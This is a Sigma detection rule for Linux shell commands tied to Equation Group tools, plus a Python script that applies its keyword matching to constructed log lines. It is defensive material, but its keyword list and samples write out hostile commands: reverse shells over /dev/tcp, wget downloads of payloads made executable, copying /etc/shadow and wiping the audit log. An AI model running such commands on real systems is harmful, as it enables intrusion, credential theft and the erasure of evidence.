Equation Group Indicators

Detects suspicious shell commands used in various Equation Group scripts and tools

Sigma rule

title: Equation Group Indicators
id: 41e5c73d-9983-4b69-bd03-e13b67e9623c
status: test
description: Detects suspicious shell commands used in various Equation Group scripts and tools
references:
    - https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1
author: Florian Roth (Nextron Systems)
date: 2017/04/09
modified: 2021/11/27
tags:
    - attack.execution
    - attack.g0020
    - attack.t1059.004
logsource:
    product: linux
detection:
    keywords:
        # evolvingstrategy, elgingamble, estesfox
        - 'chown root*chmod 4777 '
        - 'cp /bin/sh .;chown'
        # tmpwatch
        - 'chmod 4777 /tmp/.scsi/dev/bin/gsh'
        - 'chown root:root /tmp/.scsi/dev/bin/'
        # estesfox
        - 'chown root:root x;'
        # ratload
        - '/bin/telnet locip locport < /dev/console | /bin/sh'
        - '/tmp/ratload'
        # ewok
        - 'ewok -t '
        # xspy
        - 'xspy -display '
        # elatedmonkey
        - 'cat > /dev/tcp/127.0.0.1/80 <<END'
        # ftshell
        - 'rm -f /current/tmp/ftshell.latest'
        # ghost
        - 'ghost_* -v '
        # morerats client
        - ' --wipe > /dev/null'
        # noclient
        - 'ping -c 2 *; grep * /proc/net/arp >/tmp/gx'
        - 'iptables * OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;'
        # auditcleaner
        - '> /var/log/audit/audit.log; rm -f .'
        - 'cp /var/log/audit/audit.log .tmp'
        # reverse shell
        - 'sh >/dev/tcp/* <&1 2>&1'
        # packrat
        - 'ncat -vv -l -p * <'
        - 'nc -vv -l -p * <'
        # empty bowl
        - '< /dev/console | uudecode && uncompress'
        - 'sendmail -osendmail;chmod +x sendmail'
        # echowrecker
        - '/usr/bin/wget -O /tmp/a http* && chmod 755 /tmp/cron'
        # dubmoat
        - 'chmod 666 /var/run/utmp~'
        # poptop
        - 'chmod 700 nscd crond'
        # abopscript
        - 'cp /etc/shadow /tmp/.'
        # ys
        - '</dev/console |uudecode > /dev/null 2>&1 && uncompress'
        # jacktelnet
        - 'chmod 700 jp&&netstat -an|grep'
        # others
        - 'uudecode > /dev/null 2>&1 && uncompress -f * && chmod 755'
        - 'chmod 700 crond'
        - 'wget http*; chmod +x /tmp/sendmail'
        - 'chmod 700 fp sendmail pt'
        - 'chmod 755 /usr/vmsys/bin/pipe'
        - 'chmod -R 755 /usr/vmsys'
        - 'chmod 755 $opbin/*tunnel'
        - 'chmod 700 sendmail'
        - 'chmod 0700 sendmail'
        - '/usr/bin/wget http*sendmail;chmod +x sendmail;'
        - '&& telnet * 2>&1 </dev/console'
    condition: keywords
falsepositives:
    - Unknown
level: high
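The rule above is a plain Sigma `keywords` list with `condition: keywords`, so an event fires when any one entry is found anywhere in it. The following Python script is an added example, not part of the rule or of SigmaHQ, that applies those semantics as a Sigma backend would (case-insensitive substring match, `*` matching any run of characters and `?` exactly one, everything else literal) to a subset of the rule's own keywords, run over constructed log lines. The `execve_cmdline` helper and the audit-record layout it parses are assumptions made for the example: they show the one caveat a practitioner hits most often, namely that auditd `EXECVE` records split a command into `a0`, `a1`, ... fields, so the substring `chown root:root x;` never occurs in the raw record until the arguments are rejoined.

```python
import re

# Subset of the keyword list from the Sigma rule above; the remaining entries
# use exactly the same matching logic.
KEYWORDS = [
    'chown root*chmod 4777 ',
    'cp /bin/sh .;chown',
    'chown root:root x;',
    '/tmp/ratload',
    'ewok -t ',
    'cat > /dev/tcp/127.0.0.1/80 <<END',
    '> /var/log/audit/audit.log; rm -f .',
    'sh >/dev/tcp/* <&1 2>&1',
    'nc -vv -l -p * <',
    'cp /etc/shadow /tmp/.',
    '/usr/bin/wget http*sendmail;chmod +x sendmail;',
]


def keyword_to_regex(keyword: str) -> re.Pattern:
    """Translate one Sigma keyword into a compiled regex.

    Sigma keyword semantics: the string is searched for anywhere in the event
    (substring match), case-insensitive; '*' matches any run of characters and
    '?' matches exactly one. Everything else is literal, so regex
    metacharacters such as '.', '|', '$' or '+' are escaped first.
    """
    parts = re.split(r'([*?])', keyword)
    regex = ''.join(
        '.*' if p == '*' else '.' if p == '?' else re.escape(p) for p in parts
    )
    return re.compile(regex, re.IGNORECASE | re.DOTALL)


PATTERNS = [(kw, keyword_to_regex(kw)) for kw in KEYWORDS]

# Assumed auditd EXECVE argument layout: a0="..." a1="..." ... (constructed;
# real auditd hex-encodes arguments that contain spaces or quotes, which this
# example does not handle).
EXECVE_ARG = re.compile(r'\ba\d+="([^"]*)"')


def execve_cmdline(record: str) -> str:
    """Rejoin auditd EXECVE a0..aN arguments into one command line.

    Keyword rules match on a single string, so a record carrying
    a0="chown" a1="root:root" a2="x;" does not contain the substring
    'chown root:root x;' until the arguments are joined with spaces.
    Records without aN fields are returned unchanged.
    """
    args = EXECVE_ARG.findall(record)
    return ' '.join(args) if args else record


def match_event(line: str) -> list:
    """Return the keywords that fire on one normalized line (rule condition: any keyword)."""
    return [kw for kw, pat in PATTERNS if pat.search(line)]


def scan(lines) -> list:
    """Return (original line, matched keywords) for every line that triggers the rule."""
    hits = []
    for line in lines:
        matched = match_event(execve_cmdline(line))
        if matched:
            hits.append((line, matched))
    return hits


# Constructed sample log lines: one auditd-style EXECVE record and several
# shell-history-style records. Five of the six should trigger the rule.
SAMPLE_LOG = [
    'type=EXECVE msg=audit(1700000000.123:45): argc=3 a0="chown" a1="root:root" a2="x;"',
    'user=ops cmd="cp /etc/shadow /tmp/.cache"',
    'user=ops cmd="/usr/bin/wget http://example.invalid/sendmail;chmod +x sendmail;./sendmail"',
    'user=dev cmd="NC -vv -l -p 4444 < payload.bin"',
    'user=dev cmd="ls -la /tmp"',
    'user=dev cmd="chown root:root /opt/app && chmod 4777 /opt/app/helper"',
]

if __name__ == '__main__':
    for line, matched in scan(SAMPLE_LOG):
        print(f'HIT {matched!r}\n    {line}')
```

The fourth sample line is matched despite the upper-case `NC`, which is the case-insensitivity a Sigma backend applies to keyword rules; the first line only matches because the `EXECVE` arguments were rejoined before searching. When wiring this rule into a real pipeline, normalize the command line into one field the same way, or the multi-argument entries in the list will silently never fire.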
